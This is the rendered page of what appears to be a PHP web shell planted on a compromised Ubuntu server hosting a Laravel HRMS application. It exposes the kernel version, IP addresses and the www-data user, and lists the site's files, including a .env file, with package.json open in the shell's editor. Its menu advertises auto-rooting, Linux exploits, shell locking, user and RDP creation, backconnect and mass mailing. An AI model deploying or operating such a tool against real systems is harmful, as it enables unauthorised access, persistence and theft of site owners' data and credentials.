Linux uiet.co.in 5.15.0-186-generic #196-Ubuntu SMP Sat Jun 20 16:09:34 UTC 2026 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.0.165 | : 216.73.216.215
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.25
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
hrms.uiet.co.in /
[ HOME SHELL ]
Name
Size
Permission
Action
.idea
[ DIR ]
drwxr-xr-x
MetadataService
[ DIR ]
drwxr-xr-x
app
[ DIR ]
drwxr-xr-x
bootstrap
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwxr-xr-x
database
[ DIR ]
drwxr-xr-x
node_modules
[ DIR ]
drwxr-xr-x
public
[ DIR ]
drwxr-xr-x
resources
[ DIR ]
drwxr-xr-x
routes
[ DIR ]
drwxr-xr-x
storage
[ DIR ]
drwxrwxr-x
tests
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
.editorconfig
258
B
-rw-r--r--
.env
1.4
KB
-rw-r--r--
.env.example
899
B
-rw-r--r--
.gitattributes
111
B
-rw-r--r--
.gitignore
207
B
-rw-r--r--
.styleci.yml
194
B
-rw-r--r--
README.md
3.96
KB
-rw-r--r--
artisan
1.65
KB
-rw-r--r--
composer.json
2.32
KB
-rw-r--r--
composer.lock
376.07
KB
-rw-r--r--
package-lock.json
329.08
KB
-rw-r--r--
package.json
770
B
-rw-r--r--
phpunit.xml
1.17
KB
-rw-r--r--
server.php
563
B
-rw-r--r--
tailwind.config.js
487
B
-rw-r--r--
webpack.mix.js
628
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "private": true, "scripts": { "dev": "npm run development", "development": "mix", "watch": "mix watch", "watch-poll": "mix watch -- --watch-options-poll=1000", "hot": "mix watch --hot", "prod": "npm run production", "production": "mix --production" }, "devDependencies": { "@tailwindcss/forms": "^0.4.0", "alpinejs": "^3.4.2", "autoprefixer": "^10.1.0", "axios": "^0.21", "laravel-echo": "^1.11.3", "laravel-mix": "^6.0.6", "lodash": "^4.17.19", "postcss": "^8.2.1", "postcss-import": "^14.0.1", "pusher-js": "^7.0.3", "tailwindcss": "^3.0.0" }, "dependencies": { "animejs": "^3.2.1" } }
Close